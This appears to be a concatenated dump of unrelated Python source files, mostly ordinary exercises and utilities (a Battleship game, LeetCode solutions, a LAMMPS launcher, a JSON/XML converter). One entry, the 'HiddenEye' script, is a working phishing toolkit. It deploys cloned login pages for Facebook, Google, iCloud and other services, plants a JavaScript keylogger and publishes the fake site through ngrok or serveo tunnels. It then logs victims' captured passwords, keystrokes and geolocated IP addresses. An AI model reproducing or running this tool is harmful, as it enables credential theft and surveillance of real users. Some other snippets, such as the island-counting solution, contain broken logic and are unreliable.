def createShip(level, row, column, size, pos, aArray):
#VERTICAL
if pos == 0:
aArray=aColumn(level,row,column,size,aArray)
#HORIZONTAL
if pos == 1:
aArray = aRow(level,row,column,size,aArray)
#DIAGNAL
if pos == 2:
aArray = aDiagnal(level, row, column, size, aArray)
return aArray
def main():
#creating array
aArray = [[["-" for j in range(10)]for j in range(10)]for j in range(3)]
bArray = [[["-" for j in range(10)]for j in range(10)]for j in range(3)]
#list of ship sizes
sizes = [2,3,3,4,5]
clear = False
#creating 5 ships
for size in sizes:
while clear == False:
#random coodinates
level, row, column = coord()
#randomly chooses position of ship
pos = randint(0,2)
#checks for collision
clear, level, row, column, pos = collision(level, row, column, size, aArray, pos)
#if test is passed ship is created
aArray = createShip(level, row, column, size, pos, aArray)
clear = False
#Game starts
print("██████╗░░█████╗░████████╗████████╗██╗░░░░░███████╗░██████╗██╗░░██╗██╗██████╗░")
print("██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║░░░░░██╔════╝██╔════╝██║░░██║██║██╔══██╗")
print("██████╦╝███████║░░░██║░░░░░░██║░░░██║░░░░░█████╗░░╚█████╗░███████║██║██████╔╝")
print("██╔══██╗██╔══██║░░░██║░░░░░░██║░░░██║░░░░░██╔══╝░░░╚═══██╗██╔══██║██║██╔═══╝░")
print("██████╦╝██║░░██║░░░██║░░░░░░██║░░░███████╗███████╗██████╔╝██║░░██║██║██║░░░░░")
print("╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░░░░╚═╝░░░╚══════╝╚══════╝ ═════╝░╚═╝░░╚═╝╚═╝╚═╝░░░░░")
print()
run = True
spots = 0
while run:
for guess in range(30):
#printing array
print()
for i in range(3):
print("Level",i)
print(" 0 1 2 3 4 5 6 7 8 9")
for j in range(10):
print(j,end="")
for l in range(10):
print('|',end="")
print(bArray[i][j][l],end="")
if l == 9:
print("|")
print()
#User enters guess
print("🅁🄴🄼🄰🄸🄽🄸🄽🄶 🄰🅃🅃🄴🄼🄿🅃🅂:", 30-guess)
print("Spots found:",spots,"/17")
print("Enter your guess")
l=int(input("Level:"))
r=int(input("Row:"))
c=int(input("Column:"))
if aArray[l][r][c] == "S":
print()
print("Spot found!")
spots+=1
bArray[l][r][c] = "S"
else:
print("Nothing found here, try again.")
print(hint(l,r,c,aArray))
if spots == 17:
run = False
if __name__ == "__main__":
main()
|
11,010 | ea5a1ddf865ae8ef664019ecf3152656f112177a | class Solution:
def myPow(self, x: float, n: int) -> float:
if x == 1.0:
return 1.0
if n<0:
return 1/self.power(x, -n)
else:
return self.power(x, n)
def power(self, x: float, n: int) -> float:
if n==0:
return 1
v = self.power(x, n//2)
if n%2 == 0:
return v*v
else:
return v*v*x
|
11,011 | 4238a31d2eb045ac73c0f044799c6772e50ae147 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 28 09:24:03 2019
"Creates replicas of simulations starting from configurations during the equilibration"
It reads a template file and copies the files creating simulation instances
each one containing a copy of the template with the modifications indicated
in the example block of code or as in the example below
Here we modify the imput file, modifying one line with the pattern as given
by cf.modify_file
file_name = "input.lmp"
file_path = sim.folder+'/'+file_name
value_modify = sim.initial_conf.split('/')[-1]
cf.modify_file(file_path, 'read_restart', 'read_restart\t%s\n'%value_modify)
@author: sr802
"""
import glob
import sys
import os
import shutil
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../')) #This falls into Utilities path
import Lammps.core_functions as cf
from Lammps.simulation_utilities import simulation_launcher
cwd = os.getcwd() #current working directory
dir_path = os.path.dirname(os.path.realpath(__file__))#Path of this python script
# =============================================================================
# Main
# =============================================================================
def main(name, root, template, conf_folder, n_conf, epsilon, identifier, run):
"""
Args:
"""
#Getting the path to all the restart files
files = glob.glob('%s/*'%conf_folder)
times = cf.extract_digits(files)
times = [str(int(time[-1])) for time in times]
#Takign the last N configurations
conf_times = times[-n_conf:]
home = root+'/'+name+'_%s'%identifier
files_analysis = cf.parameter_finder(files,conf_times)
shutil.rmtree(home,ignore_errors=True)
for i in files_analysis:
# =============================================================================
# The extraction of the parameters for the simulation comes here
# =============================================================================
time = int(cf.extract_digits(files[i])[-1])
name = str(time)
restart = files[i]
# =============================================================================
# Creating the simulation instance
# =============================================================================
sim = simulation_launcher(home, template, name, restart)
sim.create_folder()
print('\nworking on %s'%sim.name)
# IF the template has qsub
if sim.has_qsub == False:
sim.create_qsub('short', 1, 16, 1, 'input.lmp')
else:
# Modifying as below
file_name = sim.qsub_file
file_path = sim.folder+'/'+file_name
value_modify = sim.name
cf.modify_file(file_path, '#PBS -N', '#PBS -N %s\n'%value_modify)
# =============================================================================
# #Mofications to the files here (THIS IS SPECIFIC)
# =============================================================================
file_name = "input.lmp"
file_path = sim.folder+'/'+file_name
value_modify = sim.initial_conf.split('/')[-1]
cf.modify_file(file_path, 'read_restart', 'read_restart\t%s\n'%value_modify)
file_name = "in.interaction"
file_path = sim.folder+'/'+file_name
value_modify = epsilon
cf.modify_file(file_path,'2 3','pair_coeff\t2 3 %s 1.0\n'%value_modify)
# =============================================================================
# Running the simulation
# =============================================================================
if run == True:
sim.run_simulation()
os.chdir(cwd)
if __name__ == "__main__":
"""
THIS IS VERY SPECIFIC
The arguments of this depend on the application
"""
parser = argparse.ArgumentParser(description='Launch simulations from restart',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-name', metavar='name',help='Name of the folder to keep all the simulations',default='mu_force')
parser.add_argument('-conf_folder', metavar='path_restart',help='Directory of the restart files',default='./Try/particle/')
parser.add_argument('-template', metavar='path_template',help='Directory to take as template',default=cwd+'/Template')
parser.add_argument('-root', metavar='root directory',help='Directory to create the folder for the simulations',default=cwd)
parser.add_argument('-n_conf',metavar='n conf',help='number of configurations starting from the last',default=5,type=int)
parser.add_argument('-epsilon',metavar='epsilon',help='monomer solute interaction',default=3.0,type=float)
parser.add_argument('-identifier',metavar='force',help='Numerical identifier',default=1,type=float)
parser.add_argument('-run',metavar='run',help='Define if run simulations or not. If not, just creates the folder structure',default=False,type=cf.str2bool)
args = parser.parse_args()
main(args.name, args.root, args.template, args.conf_folder, args.n_conf, args.epsilon,
args.identifier, args.run)
|
11,012 | 53730827227b72991a83b20a31f12cba3198bf68 | #!/usr/bin/python3
#-*- coding: utf-8 -*-
# HiddenEye v1.0
# By:- DARKSEC TEAM
#
###########################
from time import sleep
from sys import stdout, exit, argv
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
from subprocess import check_output
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'): #Checking network connection.
try:
urlopen(host)
return True
except:
return False
if connected() == False: #If there no network
print ('''{0}[{1}!{0}]{1} Network error. Verify your Internet connection.\n
'''.format(RED, DEFAULT))
exit(0)
def checkNgrok(): #Check if user already have Ngrok server, if False - downloading it.
if path.isfile('Server/ngrok') == False:
print('[*] Downloading Ngrok...')
if 'Android' in str(check_output(('uname', '-a'))):
filename = 'ngrok-stable-linux-arm.zip'
else:
ostype = systemos().lower()
if architecture()[0] == '64bit':
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
else:
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end(): #Message when HiddenEye exit
system('clear')
print ('''{1}THANK YOU FOR USING ! JOIN DARKSEC TEAM NOW (github.com/DarkSecDevelopers).{1}'''.format(RED, DEFAULT, CYAN))
print ('''{1}WAITING FOR YOUR CONTRIBUTION. GOOD BYE !.{1}'''.format(RED, DEFAULT, CYAN))
def loadModule(module):
print ('''{0}[{1}*{0}]{1} You Have Selected %s Module ! KEEP GOING !{0}'''.format(CYAN, DEFAULT) % module)
def runPhishing(page, option2): #Phishing pages selection menu
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
if option2 == '1' and page == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/")
if option2 == '2' and page == 'Facebook':
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
if option2 == '3' and page == 'Facebook':
copy_tree("WebPages/fb_security_fake/", "Server/www/")
if option2 == '4' and page == 'Facebook':
copy_tree("WebPages/fb_messenger/", "Server/www/")
elif option2 == '1' and page == 'Google':
copy_tree("WebPages/google_standard/", "Server/www/")
elif option2 == '2' and page == 'Google':
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
elif option2 == '3' and page == 'Google':
copy_tree("WebPages/google_advanced_web/", "Server/www/")
elif page == 'LinkedIn':
copy_tree("WebPages/linkedin/", "Server/www/")
elif page == 'GitHub':
copy_tree("WebPages/GitHub/", "Server/www/")
elif page == 'StackOverflow':
copy_tree("WebPages/stackoverflow/", "Server/www/")
elif page == 'WordPress':
copy_tree("WebPages/wordpress/", "Server/www/")
elif page == 'Twitter':
copy_tree("WebPages/twitter/", "Server/www/")
elif page == 'Snapchat':
copy_tree("WebPages/Snapchat_web/", "Server/www/")
elif page == 'Yahoo':
copy_tree("WebPages/yahoo_web/", "Server/www/")
elif page == 'Twitch':
copy_tree("WebPages/twitch/", "Server/www/")
elif page == 'Microsoft':
copy_tree("WebPages/live_web/", "Server/www/")
elif page == 'Steam':
copy_tree("WebPages/steam/", "Server/www/")
elif page == 'iCloud':
copy_tree("WebPages/iCloud/", "Server/www/")
elif option2 == '1' and page == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and page == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif option2 == '1' and page == 'VK':
copy_tree("WebPages/VK/", "Server/www/")
elif option2 == '2' and page == 'VK':
copy_tree("WebPages/VK_poll_method/", "Server/www/")
didBackground = True
logFile = None
for arg in argv:
if arg=="--nolog": #If true - don't log
didBackground = False
if didBackground:
logFile = open("log.txt", "w")
def log(ctx): #Writing log
if didBackground: #if didBackground == True, write
logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
print(ctx)
def waitCreds():
print("{0}[{1}*{0}]{1} Looks Like Everything is Ready. Now Feel The Power.".format(CYAN, DEFAULT))
print("{0}[{1}*{0}]{1} KEEP EYE ON HIDDEN WORLD WITH DARKSEC.".format(RED, DEFAULT))
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('======================================================================'.format(RED, DEFAULT))
log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
log('======================================================================'.format(RED, DEFAULT))
log(' {0}***** I KNOW YOU ARE ENJOYING. SO MAKE IT POPULAR TO GET MORE FEATURES *****{1}\n {0}{1}'.format(RED, DEFAULT))
creds.close()
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
log('======================================================================'.format(RED, DEFAULT))
creds.close()
with open('Server/www/KeyloggerData.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('______________________________________________________________________'.format(RED, DEFAULT))
log(' {0}[KEY PRESSED ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
log('______________________________________________________________________'.format(RED, DEFAULT))
creds.close()
def runPEnv(): #menu where user select what they wanna use
system('clear')
print ('''
______________________________________________________________
------>{2} HIDDEN EYE {2}<-------
{0}KEEP EYE ON HIDDEN WORLD WITH DARKSEC.
{0}[ LIVE VICTIM ATTACK INFORMATION ]
{0}[ LIVE KEYSTROKES CAN BE CAPTURED ]
_______________________________________________________________
{1}'''.format(GREEN, DEFAULT, CYAN))
if 256 != system('which php'): #Checking if user have PHP
print (" -----------------------".format(CYAN, DEFAULT))
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT))
print (" -----------------------".format(CYAN, DEFAULT))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run HiddenEye again.http://www.php.net/".format(RED, DEFAULT))
exit(0)
for i in range(101):
sleep(0.05)
stdout.write("\r{0}[{1}*{0}]{1} Eye is Opening. Please Wait... %d%%".format(CYAN, DEFAULT) % i)
stdout.flush()
if input(" \n\n{0}[{1}!{0}]{1} DO YOU AGREE TO USE THIS TOOL FOR EDUCATIONAL PURPOSE ? (y/n)\n\n{2}[HIDDENEYE-DARKSEC]- > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes
system('clear')
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT))
exit(0)
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
if option == '1':
loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
elif option == '10':
loadModule('Yahoo')
option2 = ''
runPhishing('Yahoo', option2)
elif option == '11':
loadModule('Twitch')
option2 = ''
runPhishing('Twitch', option2)
elif option == '12':
loadModule('Microsoft')
option2 = ''
runPhishing('Microsoft', option2)
elif option == '13':
loadModule('Steam')
option2 = ''
runPhishing('Steam', option2)
elif option == '14':
loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('VK', option2)
elif option == '15':
loadModule('iCloud')
option2 = ''
runPhishing('iCloud', option2)
else:
system('clear && ./HiddenEye.py')
def runServeo():
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
sleep(7)
with open('link.url') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
pass
else:
runServeo()
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
url = str(output).strip("b ' \ n")
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
def runNgrok():
system('./Server/ngrok http 1111 > /dev/null &')
while True:
sleep(2)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
urlFile = open('ngrok.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
break
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
def custom(): #Question where user can input custom web-link
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT))
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT))
print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT))
custom = input("\nCUSTOM URL >".format(CYAN, DEFAULT))
if 'https://' in custom:
pass
else:
custom = 'https://' + custom
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
with open('Server/www/post.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/post.php', 'w')
f.write(c)
f.close()
else:
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
custom()
def server(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT))
choice = input(" \n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
if choice == '1':
runNgrok()
elif choice == '2':
runServeo()
else:
system('clear')
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
end()
exit(0)
|
11,013 | bd008781654efe92c95d914125d28fcc47b3893b | import os
from PIL import Image
import datetime
import matplotlib.pyplot as plt
def crop(image_read_dir, image_save_dir):
img = Image.open(image_read_dir) # 打开图像
x, y = img.size
img1 = img.crop((0, 0, x*0.5, y*0.54))
img1.save(image_save_dir)
def main(image_read_dir, image_save_dir):
for (root, dirs, files) in os.walk(image_read_dir):#os.walk() 方法用于通过在目录树中游走输出在目录中的文件名,向上或者向下。
for file in files:
names = os.path.splitext(file) ##os.path.splitext() 将文件名和扩展名分开
if names[1] == '.png' or names[1] == '.jpg': #判断如果是图片类型
crop(os.path.join(image_read_dir, file), os.path.join(image_save_dir, file))
break
#os.path.join(path, name)—连接目录和文件名,与os.path.split(path)相对。
if __name__ == '__main__':
main()
|
11,014 | efb9d046ab89d8b8432ac7df79a2bfa2d9577cd0 | def append(xs, ys):
return xs + ys
def concat(lists):
result = []
for element in lists:
result += element
return result
def filter_clone(function, xs):
return [element for element in xs if function(element) is True]
def length(xs):
return sum(1 for _ in xs)
def map_clone(function, xs):
return [function(element) for element in xs]
def foldl(function, xs, acc):
result = acc
for element in xs:
result = function(result, element)
return result
def foldr(function, xs, acc):
result = acc
for element in xs[::-1]:
result = function(element, result)
return result
def reverse(xs):
result = []
for element in xs:
result.insert(0, element)
return result
|
11,015 | 35347c2c4b151b55b33d696661efb9228d11c3a0 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('jquery_uploader.views',
url(r'^delete/(?P<file_name>.*)/$', 'delete', name='jquery_uploader_delete'),
url(r'^upload/$', 'upload', name='jquery_uploader'),
)
|
11,016 | 0fde83575143ae7d71538e9a7bf22c93c34877e1 | import requests
import json
import jsonpath
URL='https://reqres.in/api/users?page=2'
#Send the request
response=requests.get(URL)
print(response.status_code)#Fetch status code
print(response.content)#Fetch content
print(response.headers)#Fetch headers
print(response.headers.get('Content-Type'))#Fetch headers Content-Type
print(response.headers['Content-Type'])#Fetch headers Content-Type
print(response.cookies)#Fetch cookies
print(response.encoding)#Fetch encoding
print(response.history)#Fetch history
print(response.elapsed)#Fetch elapsed
assert response.status_code==200 #Assert response status code
#Convert response text format to json format
json_Formet=json.loads(response.text)
print(json_Formet)
#Validate josn response data
#json path returns List of object
page=jsonpath.jsonpath(json_Formet,'total_pages')
assert page[0] == 2
first_name=jsonpath.jsonpath(json_Formet,'data[0].first_name')
print(first_name[0])
# Get all the last_name value from the response
for i in range(0,3):
last_name = jsonpath.jsonpath(json_Formet, 'data[' +str(i)+ '].last_name')
print(last_name[0])
print(response.raw)
print(response.raw.read(10))
print(response.json())
print(response.status_code == requests.codes.ok)
print(response.raise_for_status())
print(response.url)
print(response.elapsed.total_seconds())
print(len(response.content))
|
11,017 | ab28d88690a3ce078cf8092be209b22ff4328888 | #!/usr/bin/python3
def print_matrix_integer(matrix=[[]]):
idx = 0
for row in matrix:
for val in row:
if (idx == 0):
print('{:d}'.format(val), end='')
else:
print('{:2d}'.format(val), end='')
idx += 1
idx = 0
print()
|
11,018 | a0bc4a14c8878ac5c9facc5b710452a7a0db9bff | class Solution:
def __init__(self,row=None,col=None):
self.row = row
self.col = col
self.mainmatrix = None
def __issafe__(self,i,j):
if i < self.col or i > -1:
return False
if j < self.row or j > -1:
return False
else:
if visitedmatrix[i][j]:
return False
else:
if self.mainmatrix[i][j] == "1":
return True
def __dfs__(self,i,j,visitedmatrix):
rows = [-1,-1,-1,0,0,1,1,1]
columns = [-1,0,1,-1,1,-1,0,1]
visitedmatrix[i][j] = True
for k in range(8):
if self.__issafe__(i+rows[k],j+columns[k],visitedmatrix):
self.__dfs__(i+rows[k],j+columns[k],visitedmatrix)
def numIslands(self, grid: List[List[str]]) -> int:
y = len(grid)
x = len(grid[1])
self.row = x
self.col = y
self.mainmatrix = grid
visitedmatrix = [[False for i in range(x)]for j in range(y)]
island_count = 0
for i in range(y):
for j in range(x):
if self.mainmatrix[i][j] == "1" and visitedmatrix[i][j] == False:
print(visitedmatrix)
self.__dfs__(i,j,visitedmatrix)
print(i,j)
island_count += 1
return island_count
# Program to count islands in boolean 2D matrix
class Graph:
def __init__(self, row, col, g):
self.ROW = row
self.COL = col
self.graph = g
# A function to check if a given cell
# (row, col) can be included in DFS
def isSafe(self, i, j, visited):
# row number is in range, column number
# is in range and value is 1
# and not yet visited
return (i >= 0 and i < self.ROW and
j >= 0 and j < self.COL and
not visited[i][j] and self.graph[i][j])
# A utility function to do DFS for a 2D
# boolean matrix. It only considers
# the 8 neighbours as adjacent vertices
def DFS(self, i, j, visited):
# These arrays are used to get row and
# column numbers of 8 neighbours
# of a given cell
rowNbr = [-1, -1, -1, 0, 0, 1, 1, 1];
colNbr = [-1, 0, 1, -1, 1, -1, 0, 1];
# Mark this cell as visited
visited[i][j] = True
# Recur for all connected neighbours
for k in range(8):
if self.isSafe(i + rowNbr[k], j + colNbr[k], visited):
self.DFS(i + rowNbr[k], j + colNbr[k], visited)
# The main function that returns
# count of islands in a given boolean
# 2D matrix
def countIslands(self):
# Make a bool array to mark visited cells.
# Initially all cells are unvisited
visited = [[False for j in range(self.COL)]for i in range(self.ROW)]
# Initialize count as 0 and travese
# through the all cells of
# given matrix
count = 0
for i in range(self.ROW):
for j in range(self.COL):
# If a cell with value 1 is not visited yet,
# then new island found
if visited[i][j] == False and self.graph[i][j] == 1:
# Visit all cells in this island
# and increment island count
self.DFS(i, j, visited)
count += 1
return count
graph = [[1, 1, 0, 0, 0],
[0, 1, 0, 0, 1],
[1, 0, 0, 1, 1],
[0, 0, 0, 0, 0],
[1, 0, 1, 0, 1]]
row = len(graph)
col = len(graph[0])
g = Graph(row, col, graph)
print "Number of islands is:"
print g.countIslands()
# This code is contributed by Neelam Yadav
|
11,019 | 2acb151ee81c58b983b440d02c2e90399a906c8d | from random import *
n=randint(0,100)
print(n)
p=True
while p:
m=int(input("Guess your number (1,100) ?"))
if n==m:
print("bingo")
p=False
elif n-m>10:
print("too large")
elif 10>=n-m>0:
print("a little bit large")
elif -10<n-m<0:
print("small")
else:
print("too small")
|
11,020 | 97a89a6d26402c099398408116a43f3bb2ebfdc9 | # Generated by Django 3.1.7 on 2021-03-17 15:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='platform',
name='default_language',
),
]
|
11,021 | 37b1fbbc4c7acebf2b268b1c498e18d2e53eab56 | import xmltodict
import argparse
import json
import sys
from xml.etree import ElementTree
description = (
"This command convert from json data type to xml and vice versa. path_to_data is"
" required argument it indicate path of file that should be converted.path_to_convert "
"indicates path of file where should be saved converted data if mode is path"
)
mode = (
"if mode is path then path_to_convert is required,"
" converted data should be saved in path_to_convert file,"
"if mode is print converted data should be printed in console."
)
parser = argparse.ArgumentParser(
prog="xml-json-converter",
description=description,
usage="%(prog)s [-h] [-m {output,path}]" " \n\t\t\tpath_to-data [path_to_convert]",
)
parser.add_argument("path_to_data", type=str, help="path to file to be converted")
parser.add_argument(
"path_to_convert", type=str, help="path to file to be saved converted data"
)
parser.add_argument("-m", "--mode", help=mode, dest="{output, path}")
args = parser.parse_args()
def create_xml_tree(root, data: dict):
for k, v in data.items():
if not isinstance(v, dict):
ElementTree.SubElement(root, k).text = str(v)
else:
create_xml_tree(ElementTree.SubElement(root, k), v)
return root
file_type = args.path_to_data.split(".")[-1]
if file_type == "json":
with open(args.path_to_data, "r") as jf:
data = json.loads(jf.read())
root = ElementTree.Element("data")
create_xml_tree(root, data)
tree = ElementTree.ElementTree(root)
if (
args.__dict__["{output, path}"] == "path"
or args.__dict__["{output, path}"] is None
):
tree.write(args.path_to_convert)
elif args.__dict__["{output, path}"] == "output":
sys.stdout.write(ElementTree.tostring(root).decode("utf-8"))
else:
raise Exception("invalid command for -m/--mode")
elif file_type == "xml":
with open(args.path_to_data, "r") as xml_f:
o = xmltodict.parse(xml_f.read())
if (
args.__dict__["{output, path}"] == "path"
or args.__dict__["{output, path}"] is None
):
with open(args.path_to_convert, "w") as jf:
jf.write(json.dumps(o["data"]))
elif args.__dict__["{output, path}"] == "output":
sys.stdout.write(json.dumps(o["data"]))
else:
raise Exception("invalid command for -m/--mode")
|
11,022 | 25eeef339e23828c56e315a88037090a704c52a4 | #!/usr/bin/env python
# ============================================================================
import sys
# ===========================================================================
# = http://projecteuler.net/problem=31 =
# = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - =
# = Find the number of combinations of coins than make up 2 pounds =
# ===========================================================================
# ----------------------------------------------------------------------------
def findNumCombos(goal, denoms, master = True):
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if goal < 0:
# print '\tovershoot!'
return 0
if goal == 0:
# print '\tsolution found!'
return 1
num_combos = 0
for i, coin in enumerate(denoms):
# print '\tcoin -- %d -- next goal: %d' % (coin, goal-coin)
num_combos += findNumCombos(goal-coin, denoms[i:], False)
if master:
